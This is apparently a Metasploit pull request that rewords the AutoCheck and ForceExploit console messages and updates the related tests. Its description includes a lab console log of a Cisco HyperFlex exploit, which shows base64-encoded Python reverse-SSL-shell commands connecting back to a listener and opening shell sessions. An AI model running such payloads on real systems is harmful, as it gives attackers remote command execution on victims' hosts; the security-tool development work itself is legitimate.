### PR TITLE
Improve AutoCheck user experience (prints, etc.)

### DIFF
--- a/lib/msf/core/exploit/remote/auto_check.rb
+++ b/lib/msf/core/exploit/remote/auto_check.rb
@@ -3,8 +3,8 @@
 module Msf
 module Exploit::Remote::AutoCheck
 
-  def self.included(base)
-    raise NotImplementedError, "#{self.name} should not be included, it should be prepended"
+  def self.included(_base)
+    raise NotImplementedError, "#{name} should not be included, it should be prepended"
   end
 
   def initialize(info = {})
@@ -71,5 +71,6 @@ module Exploit::Remote::AutoCheck
       fail_with(Module::Failure::Unknown, "#{checkcode.message} #{error_msg}")
     end
   end
+
 end
 end

--- a/lib/msf/core/exploit/remote/auto_check.rb
+++ b/lib/msf/core/exploit/remote/auto_check.rb
@@ -11,7 +11,7 @@ module Exploit::Remote::AutoCheck
     super
 
     register_advanced_options([
-      OptBool.new('AutoCheck', [false, 'Run check before exploitation', true]),
+      OptBool.new('AutoCheck', [false, 'Run check before exploit', true]),
       OptBool.new('ForceExploit', [false, 'Override check result', false])
     ])
   end
@@ -36,10 +36,10 @@ module Exploit::Remote::AutoCheck
       return yield
     end
 
-    print_status('Executing automatic check (disable AutoCheck to override)')
+    print_status('Running automatic check ("set AutoCheck false" to disable)')
 
     warning_msg = 'ForceExploit is enabled, proceeding with exploitation.'
-    error_msg = 'Enable ForceExploit to override check result.'
+    error_msg = '"set ForceExploit true" to override check result.'
 
     case (checkcode = check)
     when Exploit::CheckCode::Vulnerable, Exploit::CheckCode::Appears
@@ -54,8 +54,7 @@ module Exploit::Remote::AutoCheck
         return yield
       end
 
-      fail_with(Module::Failure::NotVulnerable,
-                "#{checkcode.message} #{error_msg}")
+      fail_with(Module::Failure::NotVulnerable, "#{checkcode.message} #{error_msg}")
     when Exploit::CheckCode::Unsupported
       if datastore['ForceExploit']
         print_warning("#{checkcode.message} #{warning_msg}")

--- a/spec/lib/msf/core/exploit/remote/auto_check_spec.rb
+++ b/spec/lib/msf/core/exploit/remote/auto_check_spec.rb
@@ -100,17 +100,17 @@ RSpec.shared_examples "An AutoChecked method" do |opts|
     it_behaves_like "An AutoCheck module which can be overridden",
                     method: opts[:method],
                     check_code: ::Msf::Exploit::CheckCode::Safe,
-                    expected_error: "The target is not exploitable. Enable ForceExploit to override check result."
+                    expected_error: 'The target is not exploitable. "set ForceExploit true" to override check result.'
 
     it_behaves_like "An AutoCheck module which can be overridden",
                     method: opts[:method],
                     check_code: ::Msf::Exploit::CheckCode::Unsupported,
-                    expected_error: "This module does not support check. Enable ForceExploit to override check result."
+                    expected_error: 'This module does not support check. "set ForceExploit true" to override check result.'
 
     it_behaves_like "An AutoCheck module which can be overridden",
                     method: opts[:method],
                     check_code: ::Msf::Exploit::CheckCode::Unknown,
-                    expected_error: "Cannot reliably check exploitability. Enable ForceExploit to override check result."
+                    expected_error: 'Cannot reliably check exploitability. "set ForceExploit true" to override check result.'
   end
 end
 


### PR DESCRIPTION
Words are hard. If I break `master`, I'll fix it. (:

```
msf6 exploit(linux/http/cisco_hyperflex_hx_data_platform_cmd_exec) > run

[*] Started reverse SSL handler on 172.16.57.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. Storfs ASUP servlet detected.
[*] Selected cmd/unix/reverse_python_ssl (Unix Command)
[*] Executing command: python -c "exec(__import__('base64').b64decode(__import__('codecs').getencoder('utf-8')('aW1wb3J0IHNvY2tldCxzdWJwcm9jZXNzLG9zLHNzbApzbz1zb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULHNvY2tldC5TT0NLX1NUUkVBTSkKc28uY29ubmVjdCgoJzE3Mi4xNi41Ny4xJyw0NDQ0KSkKcz1zc2wud3JhcF9zb2NrZXQoc28pCldhPUZhbHNlCndoaWxlIG5vdCBXYToKCWRhdGE9cy5yZWN2KDEwMjQpCglpZiBsZW4oZGF0YSk9PTA6CgkJV2EgPSBUcnVlCglwcm9jPXN1YnByb2Nlc3MuUG9wZW4oZGF0YSxzaGVsbD1UcnVlLHN0ZG91dD1zdWJwcm9jZXNzLlBJUEUsc3RkZXJyPXN1YnByb2Nlc3MuUElQRSxzdGRpbj1zdWJwcm9jZXNzLlBJUEUpCglzdGRvdXRfdmFsdWU9cHJvYy5zdGRvdXQucmVhZCgpICsgcHJvYy5zdGRlcnIucmVhZCgpCglzLnNlbmQoc3Rkb3V0X3ZhbHVlKQo=')[0]))"
[*] Command shell session 1 opened (172.16.57.1:4444 -> 172.16.57.4:55064) at 2021-07-06 21:38:27 -0500
[!] Command execution timed out

^C
Abort session 1? [y/N]  y

[*] 172.16.57.4 - Command shell session 1 closed.  Reason: User exit
msf6 exploit(linux/http/cisco_hyperflex_hx_data_platform_cmd_exec) > set AutoCheck false
AutoCheck => false
msf6 exploit(linux/http/cisco_hyperflex_hx_data_platform_cmd_exec) > run

[*] Started reverse SSL handler on 172.16.57.1:4444
[!] AutoCheck is disabled, proceeding with exploitation
[*] Selected cmd/unix/reverse_python_ssl (Unix Command)
[*] Executing command: python -c "exec(__import__('base64').b64decode(__import__('codecs').getencoder('utf-8')('aW1wb3J0IHNvY2tldCxzdWJwcm9jZXNzLG9zLHNzbApzbz1zb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULHNvY2tldC5TT0NLX1NUUkVBTSkKc28uY29ubmVjdCgoJzE3Mi4xNi41Ny4xJyw0NDQ0KSkKcz1zc2wud3JhcF9zb2NrZXQoc28pCm5uPUZhbHNlCndoaWxlIG5vdCBubjoKCWRhdGE9cy5yZWN2KDEwMjQpCglpZiBsZW4oZGF0YSk9PTA6CgkJbm4gPSBUcnVlCglwcm9jPXN1YnByb2Nlc3MuUG9wZW4oZGF0YSxzaGVsbD1UcnVlLHN0ZG91dD1zdWJwcm9jZXNzLlBJUEUsc3RkZXJyPXN1YnByb2Nlc3MuUElQRSxzdGRpbj1zdWJwcm9jZXNzLlBJUEUpCglzdGRvdXRfdmFsdWU9cHJvYy5zdGRvdXQucmVhZCgpICsgcHJvYy5zdGRlcnIucmVhZCgpCglzLnNlbmQoc3Rkb3V0X3ZhbHVlKQo=')[0]))"
[*] Command shell session 2 opened (172.16.57.1:4444 -> 172.16.57.4:55068) at 2021-07-06 21:38:37 -0500
[!] Command execution timed out

^C
Abort session 2? [y/N]  y

[*] 172.16.57.4 - Command shell session 2 closed.  Reason: User exit
msf6 exploit(linux/http/cisco_hyperflex_hx_data_platform_cmd_exec) > set AutoCheck true
AutoCheck => true
msf6 exploit(linux/http/cisco_hyperflex_hx_data_platform_cmd_exec) > edit
msf6 exploit(linux/http/cisco_hyperflex_hx_data_platform_cmd_exec) > rerun
[*] Reloading module...

[*] Started reverse SSL handler on 172.16.57.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[-] Exploit aborted due to failure: not-vulnerable: The target is not exploitable. "set ForceExploit true" to override check result.
[*] Exploit completed, but no session was created.
msf6 exploit(linux/http/cisco_hyperflex_hx_data_platform_cmd_exec) > set ForceExploit true
ForceExploit => true
msf6 exploit(linux/http/cisco_hyperflex_hx_data_platform_cmd_exec) > run

[*] Started reverse SSL handler on 172.16.57.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[!] The target is not exploitable. ForceExploit is enabled, proceeding with exploitation.
[*] Selected cmd/unix/reverse_python_ssl (Unix Command)
[*] Executing command: python -c "exec(__import__('base64').b64decode(__import__('codecs').getencoder('utf-8')('aW1wb3J0IHNvY2tldCxzdWJwcm9jZXNzLG9zLHNzbApzbz1zb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULHNvY2tldC5TT0NLX1NUUkVBTSkKc28uY29ubmVjdCgoJzE3Mi4xNi41Ny4xJyw0NDQ0KSkKcz1zc2wud3JhcF9zb2NrZXQoc28pCnB2PUZhbHNlCndoaWxlIG5vdCBwdjoKCWRhdGE9cy5yZWN2KDEwMjQpCglpZiBsZW4oZGF0YSk9PTA6CgkJcHYgPSBUcnVlCglwcm9jPXN1YnByb2Nlc3MuUG9wZW4oZGF0YSxzaGVsbD1UcnVlLHN0ZG91dD1zdWJwcm9jZXNzLlBJUEUsc3RkZXJyPXN1YnByb2Nlc3MuUElQRSxzdGRpbj1zdWJwcm9jZXNzLlBJUEUpCglzdGRvdXRfdmFsdWU9cHJvYy5zdGRvdXQucmVhZCgpICsgcHJvYy5zdGRlcnIucmVhZCgpCglzLnNlbmQoc3Rkb3V0X3ZhbHVlKQo=')[0]))"
[*] Command shell session 3 opened (172.16.57.1:4444 -> 172.16.57.4:55076) at 2021-07-06 21:39:06 -0500
[!] Command execution timed out
```

Fixes #12853. For #15398.